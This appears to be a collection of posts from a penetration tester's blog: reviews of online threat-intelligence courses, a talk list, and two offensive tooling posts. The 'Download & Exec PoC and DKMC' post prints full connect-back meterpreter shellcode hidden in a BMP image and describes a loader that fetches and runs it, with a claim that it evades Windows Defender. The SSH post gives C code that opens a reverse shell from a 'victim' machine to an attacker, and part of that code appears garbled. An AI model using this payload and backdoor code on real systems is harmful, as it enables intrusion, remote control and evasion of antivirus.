Here is the paper for the Blackhat Arsenal 2018 AVET presentation:

Thanks to Nina and Florian for reviewing & improving!


Review Cybrary Advanced Cyber Threat Intelligence

Since I found that some information was missing from this course
I found a course on cybrary, which is only about 3 hours long and which is free.

So the review will also be a bit shorter. For the content please review:

Module 1 – Threat Intelligence Maturity Model is the intro, with an interesting analysis about maturity levels of organisations related to threat intelligence which I found pretty informative.

Module 2 – Campaigns and Open-Source Threat Intelligence comes with some information about OSINT and visualization, which is also covered a bit broader in the course that I took previously.

Module 3 – Sharing Operational Threat Intelligence is a bit more interesting, since here we start with “Sharing Operational Threat Intelligence”. This comes with some information about Crowdstrike & Alienvault, Yara, TLP, CybOX and STIX, TAXII. Finally some information about Tactical/Operational sharing, which was interesting, because the author seems to know that things like ROI etc. are also important when talking about security programs, the explanation of Analytic Confidence was also useful. The video about “Words of Estimative Probability” will almost certainly be useful in the future.
The tools are not explained in depth or compared to each other which is a pitty. I strongly suggest to have a look at sigma ;).

Module 4 – Strategic Threat Intelligence Analysis is something that was missing from the courses I viewed before. The topics here are:
Cognitive Bias and Logical Errors
Competing Hypothesis Analysis
Human Elements of Attribution
Nation-State Attribution
Strategic Review and Creating an Active Defense

For me the course was interesting and infomative, especially Module 3 & Module 4 brought a new perspective to me. Some of the example could be shown with more length. Further I got some more tools that I might try in future. I give the course 4/5 points.


View story at

Review Udemy “Certified Cyber Threat Intelligence Analyst”

As a second course (see previous blog post for the first course) I bought “Certified Cyber Threat Intelligence Analyst” which has the same instructor as “Certified Advanced Persistent Threat Analyst”.

Section 1: Phases Overview

The first three videos give an overview on the agenda (hunting, features&behavior extraction, attribution, tracking and take down).

The two videos following about hunting are explaining the goal of hunting, including information gathering from different sources, such as VirusTotal, underground forums, deep web and so on.

Features & Behavior Extraction covers what to extract from malware for further insight in five videos, like metadata, language, metadata, exif, strings, IPs etc..

The videos following are about Clustering and Correlation, Threat Actor Attribution, Tracking and Taking Down, followed by the quiz. Without going too deep, the videos cover sandboxing, dynamic and static malware analysis, malicious events, passive DNS, Graph DB, C2 infrastructure, TTP (yay!), OSINT and more.

The next sections go through each phase with more depth.

Section 2: Hunting

The hunting section starts with two videos with hunting and VirusTotal. This covers different techniques helping hunting, yara rules, retrohunt, searching and research. The three videos about Hacking Forums come with some examples. For this topic I highly recommend to read & and so on for more in depth information.

The two Deep Web parts are also pretty basic, nothing new if you are in cyber for some time. Also, I do not like it when “Deep/Dark Web” is only refered to shady or criminal activities. The next video is about Honeypot & OSINT, especially honeypots are big fun and you should setting up one.

The two lab videos are much longer than the other ones (<30min), and seem to be taken from a different course. The first is about VirusTotal Intelligence which gives a nice introduction to hunts, retrohunting, clustering and other functions of the platform. The second lab video is about yara. It is being said that you can get access to VT from the trainers, but I got no answer to my request, which is kind of disappointing.

Section 3: Features Extraction

The first two videos are a short introduction to the topic “Features Extraction Goal”, which is more like an introduction to static malware analysis.

The next two videos cover “Import Table Hash (imphash)”. I always have a bad feeling when people talk about MD5 in this area, since collisions are possible with MD5. Further some of the statements are a bit dangerous, for example “Cannot revert the hash to get original content” only applies for content with a certain size that is not available in any form. When you have a hash and find a matching file, for example in a antivirus database like virustotal you totally can get the original content. Just imagine a scenario where an analyst from company A is giving a bunch of MD5 to an external company B. When an employee of company A ever uploaded internal documents to VT, company B now can assign the MD5 to the uploaded document. This is why you do not share all your indicators folks.

The instructor is even talking about that hashes are “security protection features”. Pentesters love finding MD5 hashes of passwords, nothing cracks better ;).

So depending on the usecase please consider using stronger hash algorithms, also in malware analysis. Imphash might be OK at this place though, since it only refers to the import table and not to the whole binary.

For better understanding:

“Just because two binaries have the same imphash value does not mean they belong to the same threat group, or even that they are part of the same malware family”. In the course it is being said that similar imphashes mean that the malware has more or less the same source code, which is unfortunate and false leading.

The following video is about “Fuzz Hash (ssdeep)”, refer the link list for further explanation.

The first lab video is “Extracting VBA Macros with Didier Stevens Tools”. If you ever have the chance of catching up Didier Stevens and one of his workshops at a conference go there, from all I heard it is awesome and I look forward to it. First the video is going into more features of VirusTotal, then going to emldump and oledump. The second lab video is about C2 IP Pivoting, which refers to finding IPs in VBA macros in this case.

The section ends of course with a quiz.

Section 4: Behavior Extraction

Eight short videos about dynamic analysis including “Dynamic Indicators”, “Process Infector and Keylogger”, “Passive DNS” and the quiz. I won’t go deep into it here, since the titles are pretty self explaning and mainly cuckoo output is used here. Play for yourself with that ;).

Section 5: Clustering & Correlation

The first four videos are about “How Clustering & Correlation Works”. Here some of the classifiers are explained with examples and what it is for. Two videos about GraphDB follow, and a longer lab video & of course the quiz. Interesting that the tutor is not refering to the product, but to a category (neo4j, maltego) when talking about GraphDB, which was a bit confusing first.

The lab video looked good and interesting, hope I will have some time in the future to play with the VT features. The video contains an intro to viper (awesome tool) and how to use viper for correlation.

Section 6: Attribution

The topics in this section are “Where are they located?”, “Who are the targets”, “Initial Compromise”, “Privilege Escalation”, “Persistance”, “Lateral Movement”, “Exfiltration Strategy”, “Profiling the Attacker” and the final quiz. Some parts are pretty similar to the APT course.

For the discussion about attribution, in my thinking it is an approach for getting useful information for fighting an attacker. If it works, great. On a higher level things might be a bit different and give much opportunity for open discussions ;).

Section 7: Tracking

In the tracking section the videos are about “Passive DNS & Internet Port Scan”, “Lookups, OSINT and Hacking Forums” as well as the quiz. The section is pretty short and goes only a bit more in depth as section 1.

Section 8: Taking Down

This is covering “Sinkhole”, “How it works?”, “Hacking Forums”, “Victim Notification” & the quiz, the section is also short as the two sections before. Of course this is simplified, be careful, a lot can go wrong here.


As in the APT course, the course is OK for beginners, but please have in mind that some content is not high qualitiy and not complete, which is hard. Therefore I give this course three stars out of five.

I can also recommend “Malicious Software and its Underground Economy: Two Sides to Every Story” (, if still possible, which I took some time ago, the author of this course actually took down a C2 infrastructure and it is pretty interesting.

Links, as in the previous artice I added some links that are not originaly from the course:

Release: Version 0.0.3

View story at

Review Udemy “Certified Advanced Persistent Threat Analyst”

Although being a Pentester, I am also into that topic, since I also got some Incident Response experience. So I took the course as a wrap up for myself, in a special offer the course costs about 10$ instead of about 100$.

The course is starting with a short introduction of the instructor, followed by an overview and explanation of APT. The course itself is structured in four sections with a small multiple choice quiz after each section. At the end you get a certificate of completion.

Section 1: Understanding APTs

This includes an overview like motivation for attacks, some examples, organization of APT, actors, techniques, characteristics and so on.

A longer example follows which takes some examples from the show “Mr. Robot”, and the blog article . The article is worth a look, also if you do not want to take the course.

The next chapters go more in depth about “Cyber Kill Chain & APT Lifecycle”. The wording is a bit militarized here (of course), but the content is valid. All steps of the “Kill Chain” are explained upon the models introduced before, including more techniques and tactics. I missed some things here, for example it was said that attackers dump hashes and then crack them to gain further access. As a tool there was Mimikatz introduced, but no word that credentials could be received in clear text.

After that an overview about APT1 (one video) is given as well as an overview about Stuxnet (three videos). For APT1 I highly recommend to read the original report by Mandiant (, for Stuxnet the movie Zero Days ( This is followed by a chapter about cyberwar and finally by the quiz.

Section 2: Equation Group

The next section is dealing with the highly sophisticated Equation Group, which was created be the NSA (likely). After an overview it goes down to components and infection ways.

The components videos explain the skills and techniques the group used to gain access, persistence, exploitation, like for example persistence on hard disks and the different attack platforms and backdoors. When seeing what some actors are capable of, I always ask myself what they can do now? Offensive security is a broad research field and the most sophisticated and up to date techniques and exploits are of course never mentioned at conferences. Lets just imagine a google project zero but much bigger and of course working for a specific actor. I think you get my point.

Videos about DoubleFantasy, EquationDrug, GrayFish, Fanny and about the infection mechanism follow. Sometimes the instructor is talking about a lab, but there is no lab, so I guess there is another version of the course that includes a lab. One video follows called “Lab 2” (there was no “Lab 1”), the lab is an overview of the site!/threats/. The site itself is good (changed design since the course), but I don’t know why the video is called Lab.

To the end the multiple choice quiz is following.

Section 3: Advanced Dissecting Techniques

The first two videos are an overview, followed by three videos about “Binary Instrumentation” introducing Intel PIN. The first video is about 8 minutes explaining what you can do with PIN. The second video explains the pintool APIs, the third videso explains some functions more deeply with finally simple example code for using PIN. Without having some basic experience in reversing this is hard to follow.

The next four videos are about automated string decoding, where vivisect, flare-dbg and pykd is introduced. For all tools it is explained how they help building an automation process, then a short example follows. In the videos the instructor talks about a step by step demo video, but this is not included.

Four videos follow for introducing Immunity Debugger PyCommands. Immunity is still 32 bit only, but nevertheless it is still used a lot in reversing and exploitation. I also recommend to have a look at xdbg64 and of course windbg.

The videos about Windows Kernel Driver Analysis cover a basic explanation of the analysis, tools needed, basic explanation of how drivers work. Finally some windbg commands are shown for helping debugging drivers. Again unfortunately no lab is available although mentioned in the course. The end is the quiz.

I liked this section, since I’ve spent some time debugging and reversing in the past and seeing the videos make me think about some stuff I may try in the future if I have more time ;).

Section 4: Fighting APTs

This is the fourth and last section of the course. The first three videos are about “The Challenge”. The challenge is of course defending versus APTs and this gives an overview as before.

The next two videos cover Callback detection strategy. This is about detection of malicious traffic. The topics Application Crashing Monitoring, Behaviour-based Analyses and Machine Learning are also covered in short videos and at the end is the quiz again. A lot of talking about 0-days in this chapter, so before hunting 0-days I strongly suggest to do some basics first. 0-Days are not even used in APTs too often.


The instructor is not always good to understand (especially if you run the videos faster), so I used subtitles. Subtitles seem to be generated automated, so this is not 100% consistent, for example Stuxnet becomes “stook net” or Bluetooth is “brutal”, which is funny sometimes. Some things are a bit simplified, which is natural and necessary when you start explaining a complex topic.

The labs that are mentioned in the video do not exist as mentioned before, which is a pity. Further there are no slides to download. In one slide you can see that there seems to be a different version of the course. In that course seem also to be forums and chats, that would make sense. In the forum of this versions are 3 questions, with one answer to the time of this writing.

Plenty of topics are missing from my personal point of view: Digital forensics, log analysis, logging with sysmon, using splunk, ELK, base lining, Incident Response process, tactics in fighting advanced attackers just to name a few.

I give the course 3,5 stars out of 5 for the low price, for beginners in this area it is worth a look for a first overview, although some parts are more advanced, like the Advanced Dissecting Techniques chapters, which I personally enjoyed. Would have loved to see some hands-on though.

Link List (not only from the course, also from stuff I looked up while watching it):!/threats/

Download & Exec PoC and DKMC

DKMC is a tool that writes shellcode into valid pictures and was written by Mr.Un1k0d3r ( I wrote a PoC that can be used here (and of course also for other raw shellcode). The PoC is downloading a shellcode file into memory and then execute the shellcode.
Download DKMC:
Update: The PoC is now part of DKMC, see DKMC/core/util/downloadshellcodebin.c.
(You can download the source code of the PoC here:

Make the picture with the shellcode
After installing and starting DKMC perform the following steps:

Step (1)

Select an option:

[*] (gen) Generate a malicious BMP image
[*] (web) Start a web server and deliver malicious image
[*] (ps) Generate Powershell payload
[*] (sc) Generate shellcode from raw file
[*] (exit) Quit the application

>>> gen

Step (2)
The shellcode is a connect back meterpreter in this case.

(generate)>>> set shellcode \xdd\xc3\xb8\xa3\xb6\x96\x21\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x85\x31\x47\x18\x03\x47\x18\x83\xef\x5f\x54\x63\xdd\x77\x1b\x8c\x1e\x87\x7c\x04\xfb\xb6\xbc\x72\x8f\xe8\x0c\xf0\xdd\x04\xe6\x54\xf6\x9f\x8a\x70\xf9\x28\x20\xa7\x34\xa9\x19\x9b\x57\x29\x60\xc8\xb7\x10\xab\x1d\xb9\x55\xd6\xec\xeb\x0e\x9c\x43\x1c\x3b\xe8\x5f\x97\x77\xfc\xe7\x44\xcf\xff\xc6\xda\x44\xa6\xc8\xdd\x89\xd2\x40\xc6\xce\xdf\x1b\x7d\x24\xab\x9d\x57\x75\x54\x31\x96\xba\xa7\x4b\xde\x7c\x58\x3e\x16\x7f\xe5\x39\xed\x02\x31\xcf\xf6\xa4\xb2\x77\xd3\x55\x16\xe1\x90\x59\xd3\x65\xfe\x7d\xe2\xaa\x74\x79\x6f\x4d\x5b\x08\x2b\x6a\x7f\x51\xef\x13\x26\x3f\x5e\x2b\x38\xe0\x3f\x89\x32\x0c\x2b\xa0\x18\x58\xc5\xde\xd6\x98\x71\x56\x7e\xf6\xe8\xcc\xe8\x4a\x9c\xca\xef\xad\xb7\x22\x2b\x02\x6b\x16\x98\xf7\xe3\xa2\x48\x8e\x54\x2d\xa1\x23\xc8\xb8\x49\x90\xbd\x54\xf5\x17\x42\xa5\xe1\x2d\x43\xa5\xf1\x7e\x74\xc8\xa5\xce\x2b\x45\x09\x98\xaa\x39\xdf\x77\x40\xfc\x90\x2d\xd9\x41\x6c\xe6\x8c\x10\x3b\x49\x70\xdf\xea\x06\xbb\x9e\x5b\xa1\xa7\x6c\x03\xb4\x64\x23\xbd\x52\x59\xd1\x72\xee\xcf\x56\x17\x64\x9a\xfe\xb2\x4e\x63\xc9\x0b\x9a\xf7\x0c\x47\x88\x9d\x28\x93\x1c\x0d\x98\x95\xca\xbb\xaa\x76\xa5\x48\x5c\xbf\x3d\xc1\xfa\xef\xc9\x45\x98\x66\x6b\x3c\x24\x34\xca\xed\xea\xb4\xa0\x86\x27\x5b\x79\x68\x72\xa8\x1e\xb9\xce\x89\xb0\xd7\x8b\x38\x52\x18\x44\x7a\xa1\x1a\x36\x30\x81\xd6\x80\xf8\x44\xd3\xd8\x92\x09\x43\x73\x2b\x81\x14\x21\xfa\xc4\x80\x8d\x9f\x75\x7b\x3d\x59\x0d\xdb\x27\xd4\x87\xbc\xde\x8e\x65\x77\x6c\x3e\xc7\x28\x25\xb0\xa6\x9b\xc3\x55\x2d\x66\x07\xf0\xe1\x16\x15\x8b\x97\x85\xd9\x23\x0f\x7d\x53\x5c\x09\x7e\xb6\xea\x53\xd2\x51\xed\x69\x35\x25\xbe\xde\xe6\x71\x12\xb6\x60\x95\xc1\x18\x4a\x96\x3f\xf2\xc6\x62\x9f\x92\x96\x40\x1f\x62\x1e\x46\x75\x66\x70\xed\x95\x30\x18\x84\xef\x22\x5e\x99\x25\x09\x0c\x35\x95\xfb\xda\x94\x1f\x1b\x60\x18\xca\x9e\x56\x93\xe1\xc8\xde\x4f\x0a\x08\xb7\x2b\xfa\x3d\xa7\x4b\x2f\x72\x52\x79\x38\xc6\x9c\x81\xb9\xbc\xdc\xe9\xb9\x50\xdd\xe9\xd1\x50\xdd\xa9\x21\x03\xb5\x71\x86\xf0\xa0\x7d\x13\x65\x79\xd1\x15\x6e\x29\xbd\x25\x50\xd6\x3d\x75\xc6\xbe\x2f\xef\x6f\xdc\xaf\xda\xea\xe1\x24\x2a\x7f\xe6\xc5\x77\xfa\x29\xb0\x92\x5c\x69\x64\xb5\x37\x92\x64\xba\xf6\x55\xa9\x6b\xc9\x93\xf5\x5d\x1b\xf2\x34\x92\x68\x0a\x8c\x22\x3b\xa8\xa4\xa8\x43\xfe\xb7\xf8

Step (3)

(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x13828655
[+] Shellcode size 0x22c (556) bytes
[+] Generating magic bytes 0x85240292
[+] Final shellcode length is 0x27f (639) bytes
[+] New BMP header set to 0x424de97cc40300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/tools/DKMC/output/output-1520014787.bmp)

There is a webserver included, or copy the file to your favorite webserver.


Compile: wine gcc -s -m32 downloadshellcodebin.c -lwsock32 -lWs2_32
Call with a.exe

BTW tested with up to date windows 10 and not recognized by defender.

2018-03-02 21_24_51-MSEdge-Win10-VMWare - VMware Workstation

Of course the PoC can also handle raw output files from MSF.

Recommended Talks for the New Year (34C3, BH)

A new year always brings the talks from the Chaos Communication Congress. Since I had some time for watching, here is a list with my tweets of recommended talks (plus one from Blackhat). Have fun watching.


Reverse (Pseudo) Shell over SSH

So after exploring libssh a little bit I wanted to do something useful, so my idea was to have a kind of a reverse (pseudo) shell that works via SSH.

  • the client connects to the ssh server of the attacker with a port forward
  • on the attacker machine port 8080 will be opened on localhost through the ssh tunnel
  • now the attacker can connect to port 8080 with netcat and now has a pseudo shell and can execute commands
  • unfortunately I only have a small clue on how to make an interactive shell, that does not work properly at the moment


#include <libssh/libssh.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>

int pseudo_shell(ssh_session session)
  int rc;
  ssh_channel channel;
  char buffer_ssh_in[256];
  int nbytes, nwritten;
  int port = 0;
  int port2=1337;
  rc = ssh_channel_listen_forward(session, NULL, 8080, &port2);
  if (rc != SSH_OK)
    fprintf(stderr, "Error opening remote port: %s\n",
    return rc;
  channel = ssh_channel_accept_forward(session, 60000, &port);
  if (channel == NULL)
    fprintf(stderr, "Error waiting for incoming connection: %s\n",
    return SSH_ERROR;
  while (1)
    //user input
    nbytes = ssh_channel_read(channel, buffer_ssh_in, sizeof(buffer_ssh_in), 0);
    if (nbytes = comalloc) {
            comalloc *= 2;
            comout = (char *)realloc(comout, comalloc);
        memmove(comout + comlen, buffer, chread);
        comlen += chread;

    //write output
    nbytes = strlen(comout);
    nwritten = ssh_channel_write(channel, comout, nbytes);
    if (nwritten != nbytes)
      fprintf(stderr, "Error sending answer: %s\n",
      return SSH_ERROR;
    printf("Sent answer\n");
  return SSH_OK;

int main()
  ssh_session my_ssh_session;
  int rc;
  char *password;
  // Open session and set options
  my_ssh_session = ssh_new();
  if (my_ssh_session == NULL)
  ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, "");
  ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, "root");
  // Connect to server
  rc = ssh_connect(my_ssh_session);
  if (rc != SSH_OK)
    fprintf(stderr, "Error connecting to localhost: %s\n",

  // Authenticate ourselves
  // Give password here
  password = "password";
  rc = ssh_userauth_password(my_ssh_session, NULL, password);
  if (rc != SSH_AUTH_SUCCESS)
    fprintf(stderr, "Error authenticating with password: %s\n",

Get the file here.

After compiling and executing on the “victim” machine:

Now you have your shell:


Do you want to know more?